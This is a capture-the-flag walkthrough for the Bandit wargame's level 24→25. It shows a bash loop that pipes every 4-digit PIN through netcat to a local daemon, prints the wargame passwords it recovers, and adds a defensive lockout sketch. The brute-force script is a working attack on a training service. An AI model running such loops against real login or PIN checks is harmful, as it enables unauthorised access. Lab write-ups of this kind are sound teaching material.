Bandit Level 24 → Level 25

Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.


Again, I created a folder inside /tmp and made sure both the newly created folder and all the files related to this level have proper permissions (chmod 755 would be enough).

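#!/bin/bash
# Password for bandit24 (the current level)
passwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

# Four brace expansions generate every pincode from 0000 to 9999
for a in {0..9}{0..9}{0..9}{0..9}
do
    # Send "<password> <pincode>" to the daemon and append the reply to result.
    # The trailing & backgrounds each connection so the loop does not wait.
    echo "$passwd $a" | nc localhost 30002 >> result &
done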

I chose to use netcat (nc), but telnet works just as well. The passcode a is generated by four brace expansions. The >> appends the output to the file result. The & puts the command in the background so the loop can start the next iteration. Doing so saves me a lot of time waiting for this script to finish. To improve upon this, I need to find a way to terminate the loop when the correct answer is displayed. However, I didn’t know what the correct message would be at the beginning.

Using the same strategy for finding a unique line as in Level 8 → Level 9, we see that the password for the next level is the unique line of the result file.

$ sort result | uniq -u
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
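
The sweep in this post works because nothing stops a client after repeated wrong guesses. The sketch below is an added example (not part of the original post and not the daemon's real code): a PIN check with a failure counter, run against the same 0000 to 9999 sweep with and without the limit. PIN, MAX_FAILS and all function names are constructed for illustration.

```sh
#!/bin/sh
# Added example, not from the original post. PIN, MAX_FAILS and all
# function names are constructed for illustration.

PIN="7391"      # constructed 4-digit secret
MAX_FAILS=5     # consecutive failures allowed; 0 disables the limit
fails=0         # failure counter for the one account being guessed
reply=""        # last response set by check_pin

# check_pin GUESS: sets $reply; returns 0 only when the guess is accepted.
check_pin() {
    if [ "$MAX_FAILS" -gt 0 ] && [ "$fails" -ge "$MAX_FAILS" ]; then
        reply="Locked"          # refuse without comparing the guess
        return 2
    fi
    if [ "$1" = "$PIN" ]; then
        fails=0; reply="Correct!"
        return 0
    fi
    fails=$((fails + 1)); reply="Wrong!"
    return 1
}

# sweep: try 0000..9999 in order, like the loop in the post.
# Sets $evaluated (guesses actually compared) and $found (1 if PIN was hit).
sweep() {
    fails=0; evaluated=0; found=0; i=0
    while [ "$i" -le 9999 ]; do
        # Zero-pad to four digits without forking a subshell
        case ${#i} in
            1) guess="000$i" ;;
            2) guess="00$i" ;;
            3) guess="0$i" ;;
            *) guess="$i" ;;
        esac
        if check_pin "$guess"; then
            evaluated=$((evaluated + 1)); found=1
            return 0
        fi
        [ "$reply" = "Wrong!" ] && evaluated=$((evaluated + 1))
        i=$((i + 1))
    done
    return 0
}

MAX_FAILS=0; sweep
echo "no limit:   found=$found after $evaluated guesses"
MAX_FAILS=5; sweep
echo "limit of 5: found=$found after $evaluated guesses"
```

With the limit enabled, only five guesses are ever compared against the PIN, so the remaining 9995 requests reveal nothing. A real service would keep the counter per account or per source and add a reset or delay policy.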
